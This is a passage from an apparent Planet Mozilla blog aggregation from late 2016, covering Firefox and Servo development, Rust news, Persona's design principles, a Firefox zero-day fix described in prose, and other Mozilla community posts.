44 Local and external anchors Selectors level 4
45 Access to attribute values ➡️ access to arbitrary attributes hosted by arbitrary elements theough a selector inside attr() was considered and dropped
46 Linked flows Regions
47 User states
48 List numberings Counter Styles
49 Substractive text-decoration
50 Styles for map/area ➡️ ➡️ never discussed AFAIK
51 Transliteration ➡️ ➡️ discussed and dropped
52 Regexps in selectors
53 Last-of... selectors
54 Control over progressive rendering
55 Inline-blocks
56 Non-breaking inlines white-space applies to all elements since CSS 2.0...
57 Word-spacing: none
58 HSV or HSL colors
59 Standardize X colors
60 Copy-fitting/auto-sizing/auto-spacing Flexbox
61 @page inside @media
62 Color profiles dropped from Colors level 3 but in level 4
63 Underline styles
64 BECSS ➡️ ➡️ BECSS, dropped
65 // comments
66 Replaced elements w/o intrinsic size object-fit
67 Fitting replaced elements object-fit

Planet MozillaReenact is dead. Long live Reenact.

Last November, I wrote an iPhone app called Reenact that helps you reenact photos. It worked great on iOS 9, but when iOS 10 came out in July, Reenact would crash as soon as you tried to select a photo.

ic_launcher-xxxhdpi

It turns out that in iOS 10, if you don’t describe exactly why your app needs access to the user’s photos, Apple will (intentionally) crash your app. For a casual developer who doesn’t follow every iOS changelog, this was shocking — Apple essentially broke every app that accesses photos (or 15 other restricted resources) if they weren’t updated specifically for iOS 10 with this previously optional feature… and they didn’t notify the developers! They have the contact information for the developer of every app, and they know what permissions every app has requested. When you make a breaking change that large, the onus is on you to proactively send some emails.

I added the required description, and when I tried to build the app, I ran into another surprise. The programming language I used when writing Reenact was version 2 of Apple’s Swift, which had just been released two months prior. Now, one year later, Swift 2 is apparently a “legacy language version,” and Reenact wouldn’t even build without adding a setting that says, “Yes, I understand that I’m using an ancient 1-year-old programming language, and I’m ok with that.”

After I got it to build, I spent another three evenings working through all of the new warnings and errors that the untouched and previously functional codebase had somehow started generating, but in the end, I didn’t do the right combination of head-patting and tummy-rubbing, so I gave up. I’m not going to pay $99/year for an Apple Developer Program membership just to spend days debugging issues in an app I’m giving away, all because Apple isn’t passionate about backwards-compatibility. So today, one year from the day I uploaded version 1.0 to the App Store (and serendipitously, on the same day that my Developer Program membership expires), I’m abandoning Reenact on iOS.

ic_launcher_sad-big

…but I’m not abandoning Reenact. Web browsers on both desktop and mobile provide all of the functionality needed to run Reenact as a Web app — no app store needed — so I spent a few evenings polishing the code from the original Firefox OS version of Reenact, adding all of the features I put in the iOS and Android versions. If your browser supports camera sharing, you can now use Reenact just by visiting app.reenact.me.

It runs great in Firefox, Chrome, Opera, and Amazon’s Silk browser. iOS users are still out of luck, because Safari supports precisely 0% of the necessary features. (Because if web pages can do everything apps can do, who will write apps?)

One of these things just doesn't belong.

One of these things just doesn’t belong.

In summary: Reenact for iOS is dead. Reenact for the Web is alive. Both are open-source. Don’t trust anyone over 30. Leave a comment below.

Planet MozillaFixing an SVG Animation Vulnerability

At roughly 1:30pm Pacific time on November 30th, Mozilla released an update to Firefox containing a fix for a vulnerability reported as being actively used to deanonymize Tor Browser users.  Existing copies of Firefox should update automatically over the next 24 hours; users may also download the updated version manually.

Early on Tuesday, November 29th, Mozilla was provided with code for an exploit using a previously unknown vulnerability in Firefox.  The exploit was later posted to a public Tor Project mailing list by another individual.  The exploit took advantage of a bug in Firefox to allow the attacker to execute arbitrary code on the targeted system by having the victim load a web page containing malicious JavaScript and SVG code.  It used this capability to collect the IP and MAC address of the targeted system and report them back to a central server.  While the payload of the exploit would only work on Windows, the vulnerability exists on Mac OS and Linux as well.  Further details about the vulnerability and our fix will be released according to our disclosure policy.

The exploit in this case works in essentially the same way as the “network investigative technique” used by FBI to deanonymize Tor users (as FBI described it in an affidavit).  This similarity has led to speculation that this exploit was created by FBI or another law enforcement agency.  As of now, we do not know whether this is the case.  If this exploit was in fact developed and deployed by a government agency, the fact that it has been published and can now be used by anyone to attack Firefox users is a clear demonstration of how supposedly limited government hacking can become a threat to the broader Web.

Planet Mozillaabout:addons in React

While working on tracking down some tricky UI bugs in about:addons, I wondered what it would look like to rewrite it using web technologies. I've been meaning to learn React (which the Firefox devtools use), and it seems like a good choice for this kind of application:

  1. easy to create reusable components
XBL is used for this in the current about:addons, but this is a non-standard Mozilla-specific technology that we want to move away from, along with XUL.
  1. manage state transitions, undo, etc.
There is quite a bit of code in the current about:addons implementation to deal with undoing various actions. React makes it pretty easy to track this sort of thing through libraries like Redux.

To explore this a bit, I made a simple React version of about:addons. It's actually installable as a Firefox extension which overrides about:addons.

Note that it's just a proof-of-concept and almost certainly buggy - the way it's hooking into the existing sidebar in about:addons needs some work for instance. I'm also a React newb so pretty sure I'm doing it wrong. Also, I've only implemented #1 above so far, as of this writing.

I am finding React pretty easy to work with, and I suspect it'll take far less code to write something equivalent to the current implementation.

Planet MozillaToy Add-on Manager in Rust

I've been playing with Rust lately, and since I mostly work on the Add-on Manager these days, I thought I'd combine these into a toy rust version.

The Add-on Manager in Firefox is written in Javascript. It uses a lot of ES6 features, and has "chrome" (as opposed to "content") privileges, which means that it can access internal Firefox-only APIs to do things like download and install extensions, themes, and plugins.

One of the core components is a class named AddonInstall which implements a state machine to download, verify, and install add-ons. The main purpose of this toy Rust project so far has been to model the design and see what it looks like.

So far mostly it's an exercise in how awesome Enum is compared to the JS equivalent (int constants), and how nice match is (versus switch statements).

It's possible to compile the Rust app to a native binary, or alternatively to asm.js/wasm, so one thing I'd like to try soon is loading a wasm version of this Rust app inside a Firefox JSM (which is the type of JS module used for internal Firefox code).

There's a webplatform crate on crates.io that enables which allows for easy DOM access, it'd be interesting to see if this works for Firefox chrome code too.

Planet MozillaThe Joy of Coding - Episode 82

The Joy of Coding - Episode 82 mconley livehacks on real Firefox bugs while thinking aloud.

Planet MozillaRest in peace, Opera...

I think we can now safely say Opera, the browser maker, is no more. My opinions about the acquisition of the browser by a chinese trust were recently confirmed and people are let go or fleeing en masse. Rest in Peace Opera, you brought good, very good things to the Web and we'll miss you.

In fact, I'd love to see two things appear:

  • Vivaldi is of course the new Opera, it was clear from day 1. Even the name was chosen for that. The transformation will be completed the day Vivaldi joins W3C and sends representatives to the Standardization tables.
  • Vivaldi and Brave should join forces, in my humble opinion.

Planet Mozilla45.5.1 chemspill imminent

The plan was to get you a test build of TenFourFox 45.6.0 this weekend, but instead you're going to get a chemspill for 45.5.1 to fix an urgent 0-day exploit in Firefox which is already in the wild. Interestingly, the attack method is very similar to the one the FBI infamously used to deanonymise Tor users in 2013, which is a reminder that any backdoor the "good guys" can sneak through, the "bad guys" can too.

TenFourFox is technically vulnerable to the flaw, but the current implementation is x86-based and tries to attack a Windows DLL, so as written it will merely crash our PowerPC systems. In fact, without giving anything away about the underlying problem, our hybrid-endian JavaScript engine actually reduces our exposure surface further because even a PowerPC-specific exploit would require substantial modification to compromise TenFourFox in the same way. That said, we will still implement the temporary safety fix as well. The bug is a very old one, going back to at least Firefox 4.

Meanwhile, 45.6 is going to be scaled back a little. I was able to remove telemetry from the entire browser (along with its dependencies), and it certainly was snappier in some sections, but required wholesale changes to just about everything to dig it out and this is going to hurt keeping up with the ESR repository. Changes this extensive are also very likely to introduce subtle bugs. (A reminder that telemetry is disabled in TenFourFox, so your data is never transmitted, but it does accumulate internal counters and while it is rarely on a hot codepath there is still non-zero overhead having it around.) I still want to do this but probably after feature parity, so 45.6 has a smaller change where telemetry is instead only removed from user-facing chrome JavaScript. This doesn't help as much but it's a much less invasive change while we're still on source parity with 45ESR.

Also, tests with the "non-volatile" part of IonPower-NVLE showed that switching to all, or mostly, non-volatile registers in the JavaScript JIT compiler had no obvious impact on most benchmarks and occasionally was a small negative. Even changing the register allocator to simply favour non-volatile registers, without removing volatiles, had some small regressions. As it turns out, Ion actually looks pretty efficient with saving volatile registers prior to calls after all and the overhead of having to save non-volatile registers upon entry apparently overwhelms any tiny benefit of using them. However, as a holdover from my plans for NVLE, we've been saving three more non-volatile general purpose registers than we allow the allocator to use; since we're paying the overhead to use them already, I added those unused registers to the allocator and this got us around 1-2% benefit with no regression. That will ship with 45.6 and that's going to be the extent of the NVLE project.

On the plus side, however, 45.6 does have HiDPI support completely removed (because no 10.6-compatible system has a retina display, let alone any Power Mac), which makes the widget code substantially simpler in some sections, and has a couple other minor performance improvements, mostly to scrolling on image-heavy pages, and interface fixes. I also have primitive performance sampling working, which is useful because of a JavaScript interpreter infinite loop I discovered on a couple sites in the wild (and may be the cause of the over-recursion problems I've seen other places). Although it's likely Mozilla's bug and our JIT is not currently implicated, it's probably an endian issue since it doesn't occur on any Tier-1 platform; fortunately, the rough sampler I threw together was successfully able to get a sensible callstack that pointed to the actual problem, proving its functionality. We've been shipping this bug since at least TenFourFox 38, so if I don't have a fix in time it won't hold the release, but I want to resolve it as soon as possible to see if it fixes anything else. I'll talk about my adventures with the mysterious NSSampler in a future post soonish.

Watch for 45.5.1 over the weekend, and 45.6 beta probably next week.

Planet MozillaPrivileged to be a Mozillian

Mike Conley noticed a bug. There was a regression on a particular Firefox Nightly build he was tracking down. It looked like this:

A time series plot with a noticeable regression at November 6

A pretty big difference… only there was a slight problem: there were no relevant changes between the two builds. Being the kind of developer he is, :mconley looked elsewhere and found a probe that only started being included in builds starting November 16.

The plot showed him data starting from November 15.

He brought it up on irc.mozilla.org#telemetry. Roberto Vitillo was around and tried to reproduce, without success. For :mconley the regression was on November 5 and the data on the other probe started November 15. For :rvitillo the regression was on November 6 and the data started November 16. After ruling out addons, they assumed it was the dashboard’s fault and roped me into the discussion. This is what I had to say:

Hey, guess what's different between rvitillo and mconley? About 5 hours.

You see, :mconley is in the Toronto (as in Canada) Mozilla office, and Roberto is in the London (as in England) Mozilla office. There was a bug in how dates were being calculated that made it so the data displayed differently depending on your timezone. If you were on or East of the Prime Meridian you got the right answer. West? Everything looks like it happens one day early.

I hammered out a quick fix, which means the dashboard is now correct… but in thinking back over this bug in a post-mortem-kind-of-way, I realized how beneficial working in a distributed team is.

Having team members in multiple timezones not only provided us with a quick test location for diagnosing and repairing the issue, it equipped us with the mindset to think of timezones as a problematic element in the first place. Working in a distributed fashion has conferred upon us a unique and advantageous set of tools, experiences, thought processes, and mechanisms that allow us to ship amazing software to hundreds of millions of users. You don’t get that from just any cube farm.

#justmozillathings

:chutten


Planet MozillaRelEng & RelOps highlights - November 29, 2016

Welcome back. As the podiatrist said, lots of exciting stuff is afoot.

Modernize infrastructure:

The big news from the past few weeks comes from the TaskCluster migration project where we now have nightly updates being served for both Linux and Android builds on the Date project branch. If you’re following along in treeherder, this is the equivalent of “tier 2” status. We’re currently working on polish bugs and a whole bunch of verification work before we attempt to elevate these new nightly builds to tier 1 status on the mozilla-central branch, effectively supplanting the buildbot-generated variants. We hope to achieve that goal before the end of 2017. Even tier 2 is a huge milestone here, so cheers to everyone on the team who has helped make this happen, chiefly Aki, Callek, Kim, Jordan, and Mihai.

A special shout-out to Dustin who helped organize the above migration work over the past few months but writing a custom dependency tracking tool. The code is here https://github.com/taskcluster/migration and you can see output here: http://migration.taskcluster.net/ It’s been super helpful!

Improve Release Pipeline:

Many improvements to Balrog were put into production this past week, including one from a new volunteer. Ben blogged about them in detail.

Aki released several scriptworker releases to stabilize polling and gpg homedir creation. scriptworker 1.0.0b1 enables chain of trust verification.

Aki added multi-signing-format capability to scriptworker and signingscript; this is live on the Date project branch.

Aki added a shared scriptworker puppet module, making it easier to add new instance types. https://bugzilla.mozilla.org/show_bug.cgi?id=1309293

Aki released dephash 0.3.0 with pip>=9.0.0 and hashin>=0.7.0 support.

Improve CI Pipeline:

Nick optimized our requests for AWS spot pricing, shaving several minutes off the runtime of the script which launches new instances in response to pending buildbot jobs.

Kim disabled Windows XP tests on trunk, and winxp talos on all branches (https://bugzilla.mozilla.org/show_bug.cgi?id=1310836 and https://bugzilla.mozilla.org/show_bug.cgi?id=1317716) Now Alin is rebalancing the Windows 8 pools so we can enable e10s testing on Windows 8 with the re-imaged XP machines. Recall that Windows XP is moving to the ESR branch with Firefox 52 which is currently on the Aurora/Developer Edition release branch.

Kim enabled Android x86 nightly builds on the Date project branch: https://bugzilla.mozilla.org/show_bug.cgi?id=1319546

Kim enabled SETA on the graphics projects branch to reduce wait times for test machines: https://bugzilla.mozilla.org/show_bug.cgi?id=1319490

Operational:

Rok has deployed the first service based on the new releng microservices architecture. You can find the new version of TryChooser here: https://mozilla-releng.net/trychooser/ More information about the services and framework itself can be found here: https://docs.mozilla-releng.net/

Release:

Firefox 50 has been released. We’re are currently in the beta cycle for Firefox 51, which will be extra long to avoid trying to push out a major version release during the busy holiday season. We are still on-deck to release a minor security release during this period. Everyone involved in the process applauds this decision.

See you next *mumble* *mumble*!

Planet MozillaWebVR coming to Servo: Architecture and latency optimizations

WebVR coming to Servo: Architecture and latency optimizations

We are happy to announce that the first WebVR patches are landing in Servo.

For the impatients: You can download a highly experimental Servo binary compatible with HTC Vive. Switch on your headset and run servo.exe --resources-path resources webvr\room-scale.html

The current implementation supports the WebVR 1.2 spec that enables the API in contexts other than the main page thread, such as WebWorkers.

We’ve been working hard on an optimized render path for VR to achieve smooth FPS and the required less than 20ms of latency to avoid motion sickness. This is the overall architecture:

WebVR coming to Servo: Architecture and latency optimizations

Rust-WebVR Library

The Rust WebVR implementation is a dependency-free library providing both the WebVR spec implementation and the integration with the vendor specific SDKs (OpenVR, Oculus …). Having it decoupled on its own component comes with multiple advantages:

  • Fast develop-compile-test cycle. Compilation times are way faster than developing and testing in a full browser.
  • Contributions are easier because developers don’t have to deal with the complexity of a browser code base.
  • It can be used on any third party project: Room scale demo using vanilla Rust.

The API is inspired on the easy to use WebVR API but adapted to Rust design patterns. The VRService trait offers an entry point to access native SDKs like OpenVR and Oculus SDK. It allows to perform operations such as initialization, shutdown, event polling and VR Device discovery:

The VRDevice trait provides a way to interact with Virtual Reality headsets:

The integration with vendor specific SDKs (OpenVR, Oculus…) are built on top of the VRService and VRDevice traits. OpenVRService, for instance interfaces with Valve’s OpenVR API. While the code is written in Rust, native SDKs are usually implemented in C or C++. We use Rust FFI and rust-bindgen to generate Rust bindings from the native C/C++ header files.

MockService implements a mock VR device that can be used for testing or developing without having a physical headset available. You will be able to get some code done in the train or while attending a boring talk or meeting ;)

VRServiceManager is the main entry point to the rust-webvr library. It handles the life cycle and interfaces to all available VRService implementations. You can use cargo-features to register the default implementations or manually register your own ones. Here is an example of initialization in a vanilla Rust app:

WebVR integration in Servo

Performance and security are both top priorities in a Web browser. DOM Objects are allowed to use VRDevices but they neither own them or have any direct pointers to native objects. There are many reasons for this:

  • JavaScript execution is untrusted and the input data might be malicious . That’s why the entire JavaScript thread must be isolated to its own sandboxed process.
  • There could be many parallel JavaScript contexts requesting access to the same native VRDevice instance which could lead to data race conditions.
  • WebVR Spec enforces privacy and security guidelines. For example a secondary tab is not allowed to read VRDisplay data or stop a VR presentation while the user is having a VR experience in the current tab.

The WebVRThread is a trusted component that fulfills all the performance and security requirements. It owns native VRDevices, handles their life cycle inside Servo and acts a doorman for untrusted VR requests from DOM Objects. Thanks to using Rustlang the implementation is guaranteed to be safe because ownership and thread safety rules are checked at compile-time. As other Servo components traits are splitted into a separate subcomponent to avoid cyclic dependencies in Servo.

In a nutshell, the WebVRThread waits for VR Commands from DOM objects and handles them in its trusted thread. This guarantees that there are not data racing conditions when receiving parallel requests from multiple JavaScript tabs. The back and forth communication is done using IPC-Channels. Here is how the main loop is implemented:

Not all VR Commands are initiated in the DOM. The WebVR spec defines some events that are fired when a VR Display is connected, disconnected, activated... The WebVR Thread polls this events from time to time and sends them to JavaScript. This is done using an Event Polling thread which wakes up the WebVRThread by sending a PollEvents message.

The current implementation tries to minimize the use of resources. The event polling thread is only created when there is at least one live JavaScript context using the WebVR APIs and shuts down it when the tab is closed. The WebVR thread is lazy loaded and only initializes the native VRServices the first time a tab uses the WebVR APIs. The WebVR implementation does not introduce any overhead on browser startup or tab creation times.

VRCompositor Commands (integration with WebRender)

WebRender handles all the GPU and WebGL rendering work in Servo. Some of the native VR SDK functions need to run in the same render thread to have access to the OpenGL context:

  • Submitting pixels for each eye to the headset uses a OpenGL texture which can only be read by the driver from the render thread of the WebGL Context.
  • Vsync and Sync poses calls must be done in the same render thread where the pixels are sent.

WebVRThread can’t run functions in the WebGL render thread. Webrender is the only component allowed to run functions in the WebGL render thread. The VRCompositor trait is implemented by the WebVRThread using shared VRDevice instance references. It sets up the VRCompositorHandler instance into Webrender when it’s initialized.

A VRDevice instance can be shared via agnostic traits because Webrender is a trusted component too. Rust’s borrow checker enforces multithreading safety rules making very easy to write secure code. A great thing about the language is that it’s also flexible, letting you circumvent the safety rules when performance is the top priority. In our case we use old school raw pointers instead of Arc<> and Mutex<> to share VRdevices between threads in order to optimize the render path by reducing the levels of indirection and locks. Multithreading won’t be a concern in our case because:

  • VRDevice implementations are designed to allow calling compositor functions in another thread by using the Send + Sync traits provided in Rustlang.
  • Thanks to the security rules implemented in the WebVRThread, when a VRDisplay is in a presenting loop no other JSContext is granted access to the VRDisplay. So really there aren’t multithreading race conditions.

To reduce latency we also have to minimize ipc-channel messages. By using a shared memory implementation Webrender is able to call VRCompositor functions directly. VR render calls originated from JavaScript like SubmitFrame are also optimized to minimize latency. When a JavaScript thread gains access to present to a headset, it receives a trusted IPCSender instance that allows to send messages back and forth to the Webrender channel without using WebVRThread as an intermediary. This avoids potential "JavaScript DDoS" attacks by design like a secondary JavaScript tab degrading performance by flooding the WebVRThread with messages while the JavaScript tab that is presenting to the headset.

These are the VR Compositor commands that an active VRDisplay DOM object is able to send to WebRender through the IPC-Channel:

You might wonder why a vector of bytes used to send the VRFrameData. This was a design decision to decouple Webrender and the WebVR implementation. This allows for a quicker pull request cycle and avoids dependency version conflicts. Rust-WebVR and WebVRThread can be updated, even adding new fields to the VRFrameData struct without requiring further changes in Webrender. IPC-Channel messages in Servo need to be serialized using serde-serialization, so the array of bytes is used as forward-serialization solution. Rust-webvr library implements the conversion from VRFrameData to bytes using a fast old school memory transmute memcpy.

DOM Objects (Inside Servo)

DOM Objects are the ones that communicate JavaScript code with native Rust code. They rely on all the components mentioned before:

  • Structs defined in rust-webvr are used to map DOM data objects: VRFrameData, VRStageParameters, VRDisplayData and more. There are some data conversions between raw Rust float arrays and JavaScript typed arrays.
  • WebVRThread is used via ipc-channels to perform operations such as discovering devices, fetching frame data, requesting or stopping presentation to a headset.
  • The optimized Webrender path is used via ipc-channels when the WebVRThread grants present access to a VRDisplay.

The first step was to add WebIDL files files in order to auto generate some bindings. Servo requires a separate file for each object defined in WebVR. Code auto generation takes care of a lot of the boilerplate code and lets us focus on the logic specific to the API we want to expose to JavaScript.

A struct definition and trait methods implementation are required for each DOMObject defined in WebIDL files. This is what the struct for the VRDisplay DOMObject looks like:

A struct implementation for a DOMObject needs to follow some rules to ensure that the GC tracing works correctly. It requires interior mutability. The JS<DOMObjectRef> holder is used to store GC managed values in structs. On the other hand, Root<DOMObjectRef> holder must be used when dealing with GC managed values on the stack. These holders can be combined with other data types such as Heap, MutHeap, MutNullableHeap, DOMRefCell, Mutex and more depending on your nullability, mutability and multithreading requirements.

Typed arrays are used in order to share efficiently all the VRFrameData matrices and quaternions with JavaScript. To maximize performance and avoid Garbage Collection issues we added new Rust templates to create and update unique instances of typed arrays. These templates automatically call the correct SpiderMonkey C functions based on the type of a rust slice. This is the API:

The render loop at native headset frame rate is implemented using a dedicated thread. Every loop iteration syncs pose data with the headset, submits the pixels to the display using a shared OpenGL texture and waits for Vsync. It’s optimized to achieve very low latency and a stable frame rate. Both the requestAnimationFrame call of a VRDisplay in the JavaScript thread and the VRSyncPoses call in the Webrender thread are executed in parallel. This allows to get some JavaScript code executed ahead while the render thread is syncing the VRFrameData to be used for the current frame.

WebVR coming to Servo: Architecture and latency optimizations

The current implementation is able to handle the scenarios where the JavaScript thread calls GetFrameData before the render thread finishes pose synchronization. In that case JavaScript thread waits until the data is available. It also handles the case when JavaScript doesn’t call GetFrameData. When that happens it automatically reads the pending VRFrameData to avoid overflowing the IPC-Channel buffers.

To get the best out of WebVR render path, GetFrameData must be called as late as possible in your JavaScript code and SubmitFrame as soon as possible after calling GetFrameData.

Conclusion

It's been a lot of fun seeing Servo WebVR implementation take shape from the early stage without a WebGL backend until it's able to run WebVR samples at 90 fps and low latency. We found Rustlang to be a perfect language for simplifying the development of a complex parallel architecture while matching the high performance, privacy and memory safety requirements in WebVR. In addition Cargo package manager is great and makes handling optional features and complex dependency trees very straightforward.

For us the next steps will be to implement the GamePad API extensions for tracked controllers and integrate more VR devices while we continue improving the WebVR API performance and stability. Stay tuned!

Planet MozillaPersona Guiding Principles

Given the impending shutdown of Persona and the lack of a clear alternative to it, I decided to write about some of the principles that guided its design and development in the hope that it may influence future efforts in some way.

Permission-less system

There was no need for reliers (sites relying on Persona to log their users in) to ask for permission before using Persona. Just like a site doesn't need to ask for permission before creating a link to another site, reliers didn't need to apply for an API key before they got started and authenticated their users using Persona.

Similarly, identity providers (the services vouching for their users identity) didn't have to be whitelisted by reliers in order to be useful to their users.

Federation at the domain level

Just like email, Persona was federated at the domain name level and put domain owners in control. Just like they can choose who gets to manage emails for their domain, they could:

  • run their own identity provider, or
  • delegate to their favourite provider.

Site owners were also in control of the mechanism and policies involved in authenticating their users. For example, a security-sensitive corporation could decide to require 2-factor authentication for everyone or put a very short expiry on the certificates they issued.

Alternatively, a low-security domain could get away with a much simpler login mechanism (including a "0-factor" mechanism in the case of http://mockmyid.com!).

Privacy from your identity provider

While identity providers were the ones vouching for their users' identity, they didn't need to know the websites that their users are visiting. This is a potential source of control or censorship and the design of Persona was able to eliminate this.

The downside of this design of course is that it becomes impossible for an identity provider to provide their users with a list of all of the sites where they successfully logged in for audit purposes, something that centralized systems can provide easily.

The browser as a trusted agent

The browser, whether it had native support for the BrowserID protocol or not, was the agent that the user needed to trust. It connected reliers (sites using Persona for logins) and identity providers together and got to see all aspects of the login process.

It also held your private keys and therefore was the only party that could impersonate you. This is of course a power which it already held by virtue of its role as the web browser.

Additionally, since it was the one generating and holding the private keys, your browser could also choose how long these keys are valid and may choose to vary that amount of time depending on factors like a shared computer environment or Private Browsing mode.

Other clients/agents would likely be necessary as well, especially when it comes to interacting with mobile applications or native desktop applications. Each client would have its own key, but they would all be signed by the identity provider and therefore valid.

Bootstrapping a complex system requires fallbacks

Persona was a complex system which involved a number of different actors. In order to slowly roll this out without waiting on every actor to implement the BrowserID protocol (something that would have taken an infinite amount of time), fallbacks were deemed necessary:

  • client-side JavaScript implementation for browsers without built-in support
  • centralized fallback identity provider for domains without native support or a working delegation
  • centralized verifier until local verification is done within authentication libraries

In addition, to lessen the burden on the centralized identity provider fallback, Persona experimented with a number of bridges to provide quasi-native support for a few large email providers.

Support for multiple identities

User research has shown that many users choose to present a different identity to different websites. An identity system that would restrict them to a single identity wouldn't work.

Persona handled this naturally by linking identities to email addresses. Users who wanted to present a different identity to a website could simply use a different email address. For example, a work address and a personal address.

No lock-in

Persona was an identity system which didn't stand between a site and its users. It exposed email address to sites and allowed them to control the relationship with their users.

Sites wanting to move away from Persona can use the email addresses they have to both:

  • notify users of the new login system, and
  • allow users to reset (or set) their password via an email flow.

Websites should not have to depend on the operator of an identity system in order to be able to talk to their users.

Short-lived certificates instead of revocation

Instead of relying on the correct use of revocation systems, Persona used short-lived certificates in an effort to simplify this critical part of any cryptographic system.

It offered three ways to limit the lifetime of crypto keys:

  • assertion expiry (set by the client)
  • key expiry (set by the client)
  • certificate expiry (set by the identify provider)

The main drawback of such a pure expiration-based system is the increased window of time between a password change (or a similar signal that the user would like to revoke access) and the actual termination of all sessions. A short expirty can mitigate this problem, but it cannot be eliminated entirely unlike in a centralized identity system.

Planet Mozillaaccessibility tools for everyone

From The Man Who Is Transforming Microsoft:

[Satya Nadella] moves to another group of kids and then shifts his attention to a teenage student who is blind. The young woman has been working on building accessibility features using Cortana, Microsoft’s speech-activated digital assistant. She smiles and recites the menu options: “Hey Cortana. My essentials.” Despite his transatlantic jet lag Nadella is transfixed. “That’s awesome,” he says. “It’s fantastic to see you pushing the boundaries of what can be done.” He thanks her and turns toward the next group.

“I have a particular passion around accessibility, and this is something I spend quite a bit of cycles on,” Nadella tells me later. He has two daughters and a son; the son has special needs. “What she was showing me is essentially how she’s building out as a developer the tools that she can use in her everyday life to be productive. One thing is certain in life: All of us will need accessibility tools at some point.”

Planet MozillaHappy BMO Push Day!

the following changes have been pushed to bugzilla.mozilla.org:

  • [1264821] We want to replace the project kick-off form with a contract request form
  • [1310757] Update form: bugzilla.mozilla.org/form.CRM

discuss these changes on mozilla.tools.bmo.


Planet MozillaI’ve launched a Mozilla Donation Campaign for #CyberMonday craziness.

I have started a small campaign today and I am so happy to see it working – 138 engagements so far and a few donations. There is no way to see the donations, but I can see more “I have donated” tweets in the target languages.

Please retweet and take action :)

Update: Actually there is a way to check the effect of the campaign. I used a web tool to count the tweets that every user can tweet after the donation.

I can see the trend here:
hashtag-tracking-for-twitter-instagram-and-facebook-keyhole

The post I’ve launched a Mozilla Donation Campaign for #CyberMonday craziness. appeared first on Bogomil Shopov.

Planet MozillaThis Week in Rust 158

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Other Weeklies from Rust Community

Crate of the Week

Since there were no nominations, this week has to go without a Crate of the Week. Sorry. Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

66 pull requests were merged in the last week. Not much, but there were a good number of awesome changes:

New Contributors

  • fkjogu
  • Paul Lietar
  • Sam Estep
  • Vickenty Fesunov

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

No new RFCs were proposed this week.

Style RFCs

Style RFCs are part of the process for deciding on style guidelines for the Rust community and defaults for Rustfmt. The process is similar to the RFC process, but we try to reach rough consensus on issues (including a final comment period) before progressing to PRs. Just like the RFC process, all users are welcome to comment and submit RFCs. If you want to help decide what Rust code should look like, come get involved!

PRs:

Ready for PR:

Final comment period:

Other notable issues:

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email the Rust Community Team for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

No quote was selected for QotW.

Submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and brson.

Planet MozillaAnnouncing git-cinnabar 0.4.0 release candidate

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.4.0b3?

  • Updated git to 2.10.2 for cinnabar-helper.
  • Added a new git cinnabar download command to download a helper on platforms where one is available.
  • Fixed some corner cases with pack windows in the helper. This prevented cloning mozilla-central with the helper.
  • Fixed bundle2 support that broke cloning from a mercurial 4.0 server in some cases.
  • Fixed some corner cases involving empty files. This prevented cloning Mozilla’s stylo incubator repository.
  • Fixed some correctness issues in file parenting when pushing changesets pulled from one mercurial repository to another.
  • Various improvements to the rules to build the helper.
  • Experimental (and slow) support for pushing merges, with caveats. See issue #20 for details about the current status.

And since I realize I didn’t announce beta 3:

What’s new since 0.4.0b2?

  • Properly handle bundle2 errors, avoiding git to believe a push happened when it didn’t. (0.3.x is unaffected)

Planet MozillaThe Glass Room: Looking into Your Online Life

It’s that time of year! The excitement of Black Friday carries into today – CyberMonday – the juxtaposition of the analog age and the digital age. Both days are fueled by media and retailers alike and are about shopping. And both days are heavily reliant on the things that we want, that we need and what we think others want and need. And, all of it is powered by the data about us as consumers. So, today – the day of electronic shopping – is the perfect day to provoke some deep thinking on how our digital lives impact our privacy and online security. How do we do this?

One way is by launching “The Glass Room” – an art exhibition and educational space that teaches visitors about the relationship between technology, privacy and online security. The Glass Room will be open in downtown New York City for most of the holiday shopping season. Anyone can enter the “UnStore” for free to get a behind the scenes look at what happens to your privacy online. You’ll also get access to a crew of “InGeniouses” who can help you with online privacy and data tips and tricks. The Glass Room has 54 interactive works that show visitors the relationship between your personal data and the technology services and products you use.

glass-room

This is no small task. Most of us don’t think about our online security and privacy every day. As with our personal health it is important but presumed. Still, when we don’t take preventative care of ourselves, we are at greater risk for getting sick.

The same is true online. We are impacted by security and privacy issues everyday without even realizing it. In the crush of our daily lives, few of us have the time to learn how to better protect ourselves and preserve our privacy online. We don’t always take enough time to get our checkups, eat healthily and stay active – but we would be healthier if we did. We are launching The Glass Room to allow you to think, enjoy and learn how to do a checkup of your online health.

We can buy just about anything we imagine on CyberMonday and have it immediately shipped to our door. We have to work a little harder to protect our priceless privacy and security online. As we collectively exercise our shopping muscles, I hope we can also think about the broader importance of our online behaviors to maintaining our online health.

If you are in New York City, please come down to The Glass Room and join the discussion. You can also check out all the projects, products and stories that The Glass Room will show you to look into your online life from different perspectives by visiting The Glass Room online.

 

Planet MozillaRustifying IronFunctions

Rustifying IronFunctions

As mentioned in my previous blog post there is new open-source, lambda compatible, on-premise, language agnostic, server-less compute service called IronFunctions.
Rustifying IronFunctions

While IronFunctions is written in Go. Rust is still very much admired language and it was decided to add support for it in the fn tool.

So now you can use the fn tool to create and publish functions written in rust.

Using rust with functions

The easiest way to create a iron function in rust is via cargo and fn.

Prerequisites

First create an empty rust project as follows:

$ cargo init --name func --bin

